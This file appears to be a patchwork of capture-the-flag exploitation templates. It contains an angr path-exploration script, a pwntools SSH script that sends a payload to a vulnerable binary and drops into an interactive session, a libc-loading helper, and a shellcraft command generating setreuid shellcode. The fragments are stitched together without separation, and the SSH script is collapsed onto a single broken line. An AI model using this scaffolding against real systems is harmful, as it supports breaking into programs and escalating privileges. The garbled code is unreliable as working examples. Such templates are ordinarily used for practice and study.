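import angr
import sys


def main(argv):
    """Explore the target binary with angr and print stdin for each finished path.

    Args:
        argv: Command-line arguments. Currently unused; the binary path is
            the ``"<binary>"`` placeholder below and must be filled in.

    Raises:
        Exception: If exploration leaves no state in the ``deadended`` stash.
    """
    path_to_binary = "<binary>"
    project = angr.Project(path_to_binary)
    initial_state = project.factory.entry_state()
    sm = project.factory.simgr(initial_state)

    # list of basic blocks to find or to avoid
    sm.explore(find=[], avoid=[])

    # The original attached this raise to a ``for ... else`` with no ``break``,
    # so it fired on every run, even after solutions had been printed.
    # Raise only when there is nothing to report.
    if not sm.deadended:
        raise Exception('Could not find the solution')

    # NOTE(review): once ``find`` is populated, explore() places matching
    # states in the ``found`` stash; this template reads ``deadended`` —
    # confirm which stash holds the states you want.
    for state in sm.deadended:
        # Dump the concrete stdin bytes that drive execution down this path.
        print(state.posix.dumps(sys.stdin.fileno()))


if __name__ == '__main__':
    main(sys.argv)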
#!/usr/bin/pythonfrom pwn import *​s = ssh(host='', user='', password='')p = s.run('cd <path> && ./<vuln>')p.recv()p.sendline(<payload>)p.interactive()s.close()
def get(x):
    """Skip past the ``'<x> : '`` prompt and return the integer that follows.

    Reads from ``sh``, which is not defined in this snippet — presumably an
    already-connected pwntools tube; confirm against the surrounding script.
    """
    prompt = '{} : '.format(x)
    sh.recvuntil(prompt)
    # The remainder of the line is parsed as a base-10 integer.
    return int(sh.recvline())


p = get('p')
# Load the libc and the target binary; <name> is a template placeholder
# for each file's path.
libc = ELF(<name>)
main = ELF(<name>)

# Start the target locally with LD_PRELOAD pointing at the loaded libc, so
# the process runs against that libc build rather than the system one.
preload_env = {'LD_PRELOAD': libc.path}
r = main.process(env=preload_env)
# pwntools command-line tool: emit the amd64 Linux `setreuid` shellcraft
# template, passing 1002 as its argument (presumably the uid — confirm).
# NOTE(review): `-f d` should select the "escaped" output format; check
# `pwn shellcraft -h` for the format list on your installed version.
pwn shellcraft -f d amd64.linux.setreuid 1002